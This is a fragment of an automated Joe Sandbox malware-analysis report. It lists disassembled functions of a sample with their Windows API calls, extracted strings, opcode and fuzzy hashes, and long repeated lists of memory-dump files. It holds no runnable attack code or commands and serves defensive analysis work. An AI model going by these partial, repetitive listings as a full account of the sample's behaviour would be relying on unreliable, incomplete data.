                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8$n$n$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                                • Opcode ID: 216cf784fcf9e46f0ab0b3fd3b03ffee15526c3e3d01e5c6d2a29d675902f7e4
                                                                                                                                                                                                                                                                                                • Instruction ID: ddd097c91ce82cc549c564f295aca5a5d11b1065950c6bd3b950c6c1f0e2623f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 216cf784fcf9e46f0ab0b3fd3b03ffee15526c3e3d01e5c6d2a29d675902f7e4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3B107B3D012245BF728CA28DD9AAEABB79EB91304F0541BAE80D661C0D77D1FC5CE51
                                                                                                                                                                                                                                                                                                Function 00438145 Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ExitProcess$ExitProcess$G<2@
                                                                                                                                                                                                                                                                                                • API String ID: 0-4201739117
                                                                                                                                                                                                                                                                                                • Opcode ID: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                                • Instruction ID: c23cf397cf820b6e4d04b4d7928b2605fb7b39ed8a8d5c6d7e07ee262c8ce929
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBD16CB1D052699BDB24CB14CD94BEAB7B1FF88300F1481EAE909A7341DA386EC1CF55
                                                                                                                                                                                                                                                                                                Function 00463750 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?,?,?,00462FCF,?), ref: 00463797
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 1705453755-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d361454ac5cdfa27015c84eaa1fed5b08bb663ce5d8b65a2c27fb38a1a831b9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811C5B69087019FC354DF69D98599BB7E4BF9C700F008A2EF4AE83250E731A548CF96
                                                                                                                                                                                                                                                                                                Function 00462F00 Relevance: 3.2, APIs: 2, Instructions: 213fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000003), ref: 0046300E
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0046301E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004631F0: FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$FileFirst$Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2810966245-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                                • Instruction ID: 9b1d8f8ee81afef67cdd5002a011b417e39822a31e6c33f357b0cfbac9d9b473
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A38161711083819FC314DF14D988AABBBE8FFD9715F000A2EF59A83291DB749948CB67
                                                                                                                                                                                                                                                                                                Function 00460070 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 9847766-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                                • Instruction ID: b288529985f008a1a54ef72dbef53761962e394cc992aae83e13a0fae47ca317
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40F09CB5254B01AFD324CF55D841F53B7F9AB88B04F104A1DB68A87680D775F814CB55
                                                                                                                                                                                                                                                                                                Function 004579F0 Relevance: 2.9, Strings: 1, Instructions: 1603COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 0-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: b6e6f1d30904bbd89972e7c5541cf27078fea097c689c36a5cb6ef6dd1844168
                                                                                                                                                                                                                                                                                                • Instruction ID: b08322f707590d6679d8a3345288254223faeb83914a9e5506ea8f8450595ff3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6e6f1d30904bbd89972e7c5541cf27078fea097c689c36a5cb6ef6dd1844168
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61D27C716083459FD720DF24C880AABB7E5BF88705F14491EF989A7312DB34ED49CB9A
                                                                                                                                                                                                                                                                                                Function 00434B63 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: KI94$M2PN
                                                                                                                                                                                                                                                                                                • API String ID: 0-2130967697
                                                                                                                                                                                                                                                                                                • Opcode ID: f00ddf2e6814fb0bafb74f8880a32f88e363ea16a4c898691e4a73b4cb37064c
                                                                                                                                                                                                                                                                                                • Instruction ID: 055610ecb8a69108d46e9ee1e057cb88f7b00d00f8ad207b40a4f8ebf115bd09
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f00ddf2e6814fb0bafb74f8880a32f88e363ea16a4c898691e4a73b4cb37064c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 586118B3D116145AF76CCA25DC9AAEBBB78EB85304F1081BBE00E56584DA7C5BC1CE41
                                                                                                                                                                                                                                                                                                Function 00474040 Relevance: 2.5, APIs: 2, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00474063
                                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00474074
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                                • Instruction ID: 0e5b393c9cfaccf242b34e640deb84f37198d475fe7bd5f1c49fe5a9f1fc366a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF05E716002405BD7209FA5D848FA3779C9F85350F04C12EE65D873A1DB79E881CB99
                                                                                                                                                                                                                                                                                                Function 00420B40 Relevance: 1.5, APIs: 1, Instructions: 22windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 00420B4C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00420970: GetWindowRect.USER32(?,?), ref: 004209E6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
